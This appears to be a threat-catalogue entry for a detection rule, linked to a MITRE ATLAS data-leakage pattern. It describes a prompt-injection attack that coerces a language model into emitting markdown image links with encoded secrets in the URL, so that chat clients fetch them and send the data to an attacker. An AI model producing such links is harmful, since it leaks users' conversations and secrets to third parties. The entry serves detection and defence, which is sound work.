Markdown Image URL Data Exfiltration - ATR-2026-00261 (da04cba6-d7d7-5866-afd6-3bff9f29b196)
Detects prompts that coerce the LLM into emitting a markdown image reference with sensitive data encoded into the URL path or query string, exploiting auto-fetch behaviour in chat UIs. When the client renders the markdown, the browser makes a GET request to the attacker-controlled domain, leaking conversation context or retrieved secrets. Technique from NVIDIA garak xss probe family (prompt templates use concatenated strings with base64-encoded payloads in image src URIs).
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| Markdown Image URL Data Exfiltration - ATR-2026-00261 (da04cba6-d7d7-5866-afd6-3bff9f29b196) | Agent Threat Rules | LLM Data Leakage (45d378aa-20ae-401d-bf61-7f00104eeaca) | MITRE ATLAS Attack Pattern | 1 |